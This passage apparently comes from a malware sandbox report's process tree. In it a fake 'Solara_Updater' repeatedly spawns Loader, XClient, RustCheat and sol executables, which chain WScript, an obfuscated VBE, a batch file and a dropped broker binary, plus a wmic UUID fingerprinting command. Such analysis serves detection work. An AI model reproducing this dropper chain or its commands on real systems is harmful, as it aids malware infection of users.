                                                                                                                                                                                                                                                                                              • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                33⤵
                                                                                                                                                                                                                                                                                                  PID:1680
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                            30⤵
                                                                                                                                                                                                                                                                                              PID:1760
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                31⤵
                                                                                                                                                                                                                                                                                                  PID:1668
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\XClient.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
                                                                                                                                                                                                                                                                                                    32⤵
                                                                                                                                                                                                                                                                                                      PID:2548
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
                                                                                                                                                                                                                                                                                                      32⤵
                                                                                                                                                                                                                                                                                                        PID:2556
                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                          "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                                                                          33⤵
                                                                                                                                                                                                                                                                                                            PID:2780
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                        31⤵
                                                                                                                                                                                                                                                                                                          PID:1512
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                            32⤵
                                                                                                                                                                                                                                                                                                              PID:836
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                33⤵
                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                PID:1464
                                                                                                                                                                                                                                                                                                                • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                  "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                  34⤵
                                                                                                                                                                                                                                                                                                                    PID:1492
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                              31⤵
                                                                                                                                                                                                                                                                                                                PID:1596
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                                                                                                                    PID:316
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                    32⤵
                                                                                                                                                                                                                                                                                                                      PID:2024
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                        33⤵
                                                                                                                                                                                                                                                                                                                          PID:2056
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                            34⤵
                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                            PID:1604
                                                                                                                                                                                                                                                                                                                            • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                              "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                              35⤵
                                                                                                                                                                                                                                                                                                                                PID:2516
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                          32⤵
                                                                                                                                                                                                                                                                                                                            PID:1476
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                              33⤵
                                                                                                                                                                                                                                                                                                                                PID:1576
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\XClient.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
                                                                                                                                                                                                                                                                                                                                  34⤵
                                                                                                                                                                                                                                                                                                                                    PID:1592
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
                                                                                                                                                                                                                                                                                                                                    34⤵
                                                                                                                                                                                                                                                                                                                                      PID:2980
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                    33⤵
                                                                                                                                                                                                                                                                                                                                      PID:948
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                        34⤵
                                                                                                                                                                                                                                                                                                                                          PID:2848
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                            cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                            35⤵
                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                            PID:1764
                                                                                                                                                                                                                                                                                                                                            • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                              "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                              36⤵
                                                                                                                                                                                                                                                                                                                                                PID:380
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                          33⤵
                                                                                                                                                                                                                                                                                                                                            PID:2516
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                              34⤵
                                                                                                                                                                                                                                                                                                                                                PID:1420
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                34⤵
                                                                                                                                                                                                                                                                                                                                                  PID:3000
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                    35⤵
                                                                                                                                                                                                                                                                                                                                                      PID:2512
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                        36⤵
                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                        PID:2328
                                                                                                                                                                                                                                                                                                                                                        • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                          37⤵
                                                                                                                                                                                                                                                                                                                                                            PID:1820
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                      34⤵
                                                                                                                                                                                                                                                                                                                                                        PID:2876
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                          35⤵
                                                                                                                                                                                                                                                                                                                                                            PID:1508
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\XClient.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
                                                                                                                                                                                                                                                                                                                                                              36⤵
                                                                                                                                                                                                                                                                                                                                                                PID:1524
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
                                                                                                                                                                                                                                                                                                                                                                36⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:2760
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                35⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:2396
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                    36⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:940
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                        37⤵
                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                        PID:2224
                                                                                                                                                                                                                                                                                                                                                                        • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                          38⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:2244
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                      35⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:1496
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                          36⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:1232
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                            36⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:792
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                37⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:2752
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                    cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                    38⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                    PID:2188
                                                                                                                                                                                                                                                                                                                                                                                    • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                      39⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:2788
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                  36⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:1824
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                      37⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:1652
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                        37⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:2496
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                            38⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:2336
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                39⤵
                                                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                PID:2164
                                                                                                                                                                                                                                                                                                                                                                                                • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                  40⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:2368
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                              37⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:2264
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                  38⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:3044
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                    38⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:2756
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                        39⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:2636
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                            cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                            40⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                            PID:2084
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              41⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:2060
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                          38⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:2092
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              39⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:2080
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                39⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2760
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                    40⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1556
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                        41⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1256
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                          42⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2520
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                      39⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1344
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                          40⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1976
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                            40⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3048
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                41⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1836
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                    42⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2160
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                      43⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1480
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                  40⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2152
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                      41⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2408
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                        41⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1628
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                            42⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2600
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                43⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1460
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  44⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2640
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                              41⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2292
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  42⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2252
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    42⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1960
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                        43⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1828
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                            44⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2296
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              45⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2388
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                          42⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1744
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              43⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2452
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                43⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    44⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1344
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        45⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          46⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
